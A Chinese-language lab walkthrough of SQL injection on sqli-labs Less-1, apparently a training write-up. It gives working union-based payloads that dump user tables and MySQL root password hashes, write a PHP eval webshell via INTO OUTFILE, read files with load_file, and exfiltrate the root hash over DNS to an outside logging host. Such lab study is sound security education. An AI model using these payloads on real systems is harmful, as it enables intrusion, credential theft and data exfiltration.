目录
基础回顾
- 注释符
- 基于类型分类
- SQL注入基本思路
Sqli-labs-Less-1
- 数据获取
- 信息收集
- 写入WebShell
- 文件读取
- DNSLog-OOB
基础回顾
注释符
Mysql 有三种常用注释符:
--[空格] 注意,后边有一个空格
# 通过#进行注释
/* */ 注释掉符号内的内容
但因为要经过url编码(即经过浏览器),我们需要进行对应修改。
--[空格] => --+或--%20因为+url编码后会被解析成空格。
# => %23 在html中#有特殊的含义(CSS选择器用于页面定位),所以直接使用其url编码。
/* */ 无需变更,在后边的内联注释waf绕过我们需要用到。
基于类型分类
数字型注入
当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。字符型注入
当输入的参数为字符串时,称为字符型。
字符型和数字型最大的区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。
SQL注入基本思路:
1.注入点测试,是否存在?字符型or数字型?
2.猜解 SQL 查询语句中的字段数
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.查询到账户的数据
Sqli-labs-Less-1
数据获取
我们按照完整渗透思路来一遍:
id=1 and 1=2 [正常]
id=1%27 [报错]
id=1%27--+ [正常]
由此判断存在注入,类型为字符型,则我们需要闭合前面的单引号,并将后面的单引号注释掉。
使用ORDER BY 猜解字段数量(二分法):
ORDER BY 语句用于根据指定的列对结果集进行排序(升序),可跟列名或数字。
id=1%27 order by 10--+ [报错]
id=1%27 order by 5--+ [报错]
id=1%27 order by 3--+ [正常]
id=1%27 order by 4--+ [报错]
其中报错返回Unknown column '4' in 'order clause',其不能识别列4,由此我们判断该表存在三列,即字段数为3。
使用UNION判断显示位与显示的字段顺序:
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。
请注意,UNION 内部的每个 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每个 SELECT 语句中的列的顺序必须相同。
id=0%27 union select 1,2,3%23
由此判断2,3字段为显示位。
然后我们继续借助联合查询获取当前数据库信息:
#查看当前数据库
id=0%27 union select 1,(select database()),3%23
#查看指定数据库中的数据表
id=0%27 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=%27security%27),3%23
#查看指定数据库中的指定数据表中的字段名
id=0%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=%27users%27 and table_schema=%27security%27),3%23
#查看指定数据库中的指定数据表中的指定字段的数据
id=0%27 union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)%23
然而真正的渗透测试到这里远没有结束,测试任务正式开始~
信息收集
#查看当前用户权限和版本号,可以根据数据库版本查找相关漏洞利用
id=0%27 union select 1,(user()),(version())%23
#查看全部数据库:
id=0%27 union select 1,(select group_concat(schema_name) from information_schema.schemata),3%23
在返回的数据库中我们看到了默认表MySQL,众所周知MySQL数据库默认root密码的位置是mysql.user,此处刚好为root权限,我们尝试获取用户密码:
#查看mysql.user字段名
id=0%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=%27users%27 and table_schema=%27mysql%27),3%23
#查看数据库账号密码
id=0%27 union select 1,(select group_concat(user) from mysql.user),(select group_concat(hex(password)) from mysql.user)%23
注意,这里数据库中的密码是带有
*的,不符合union语法,会报如下错误。
所以我们进行16进制转码,读出后再转会字符串进行破解。
到这里配置和环境允许的话可以尝试数据库直连。
写入WebShell
在这里我们继续我们的拓展,尝试手工注入webshell,因为是实验环境,此处假设我们拿到了服务器绝对路径:
id=0%27 union select 1,2,%27<?php eval($_POST[rabbit]);?>%27INTO OUTFILE %27C:/Environment/WWW/sqllibs/Less-1/rabbit.php%27--+
webshell上传成功,过刀菜狗直连即可,此处不再拓展。
文件读取
然后我们继续换方向,通过sql手工注入读取敏感文件,额,Windows没啥好玩的,自己写个flag吧:
id=0%27 union select 1,load_file(%27C:/Environment/WWW/sqllibs/Less-1/flag.txt%27),3--+
DNSLog-OOB
继续深入,来个进阶模式吧,这里我们之前提到了,2,3位为显示位,如果特殊情形下需求我们只能使用1来获取结果,我们如何去做呢?
DNSLog实现SQL注入结果外带,来实现OOB攻击。
id=0%27 union select LOAD_FILE(concat("////",(select mid(password,2) from mysql.user where user=%27root%27 limit 1),%27.xxxxx.ceye.io//abc%27)),2,3--+
这里我们做点解释:
- mid()函数对password做截取,这是因为域名中不能出现
*,这也是hex()函数的一种取代方案,毕竟域名前缀有63位长度的限制,容易超标。 - 关于DNSlog平台,大家可以自行搭建或者使用在线平台,这里稍微推荐下吧:
自建:https://github.com/BugScanTeam/DNSLog
在线:http://ceye.io
显然,因为不是显示位,我们没有收到任何回显:
查看下我们的DNS日志:
成功拿到root用户hash,多说一句,显然DNSlog的方式不仅可以应对非显示位的SQL注入,更可以胜任SQL盲注的问题。
借此机会简单回顾了下SQL手工注入的基础内容,求轻喷~
